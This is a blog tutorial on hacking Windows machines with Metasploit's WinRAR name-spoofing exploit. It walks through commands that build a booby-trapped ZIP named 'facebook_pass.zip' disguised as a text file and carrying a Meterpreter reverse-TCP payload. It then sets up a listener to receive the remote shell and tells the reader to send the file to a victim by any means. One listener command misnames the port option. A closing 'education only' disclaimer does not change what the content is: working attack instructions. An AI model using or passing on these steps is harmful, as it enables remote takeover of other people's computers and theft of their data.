Hello folks, In this post, I’ll be explaining to you that how can you Hack windows System using a Text file using Metasploit framework. This trick uses winrar_name_spoofing vulnerability. using this vulnerability we can create a vulnerable ZIP file and inside a zip file, the payload file will be present in the form of .txt format. Whenever a victim opens that text file, a meterpreter session will be established on the Attacker side. So let’s start the tutorial.

Requirements

For the better understanding of this tutorial, please read this post first

What Are We Covering Today?

1. We will generate a Payload in ZIP format using Metasploit Framework

2. after that, we will create a listener for that payload

3. Now we will exploit the victim’s system.

Steps to create a Payload using Metasploit Framework

Step 1: Open the terminal and launch the Metasploit framework using the following command

msfconsole

Step 2: Once you are in msfconsole, type the following command to use the winrar_name_spoofing vulnerability

use exploit/windows/fileformat/winrar_name_spoofing

Step 3: Now you can type the following command to show the available option which can be used to generate the Payload

show options

The output of the command show options will be as follows.

Hack windows Text File

in this, there are two options we have to set. The first one is FILENAME which will be in .zip format and the second one is SPOOF which will be in .txt format

Step 4: Now we have to set the name of the file and the name of the spoofed file which will be inside the ZIP file. for that execute the following commands one by one

set FILENAME facebook_pass.zip
set SPOOF pass.txt

Step 5: In this step, we need to set LHOST and LPORT. since I’m using it on my Local Network, I’ll put my local IP Address and LPORT as 4444. execute the following commands one by one

set LHOST 192.168.0.104
set LPORT 4444

Step 6: Now we need to set the Payload, to do that execute the following command in the terminal

set payload windows/meterpreter/reverse_tcp

Hack windows Text File
Now type exploit and then a file with named facebook_pass.zip will be created into the location /root/.msf4/local/facebook.pass.zip Copy the file and sent it to the victim by any method you want. 

Steps to create a Listener for the Payload

In this step, we will create a listener for our Payload. This process is the same as we have done in our Android hacking post.

Step 1: Now type the following command to use the multi/handler

use exploit/multi/handler

Step 2: Now we need to set the payload, for that we need to execute the following command

set payload windows/meterpreter/reverse_tcp

Step 3: Now set the LHOST and LPORT for the listener, type the following command for that

set LHOST 192.168.0.104
set PORT 4444

Step 4: Now type the exploit in the terminal, and your exploit will run

exploit

Disclaimer: My dear visitors, this article is only for the sake of education, please do not misuse all the guide given below this may cause some actions on you. if this happens then this blog will not be responsible for that


Rajesh Ranjan

I'm a tech enthusiast currently pursuing B.Tech in Computer Science & Engineering. trying to make things as simple as possible

Leave a Reply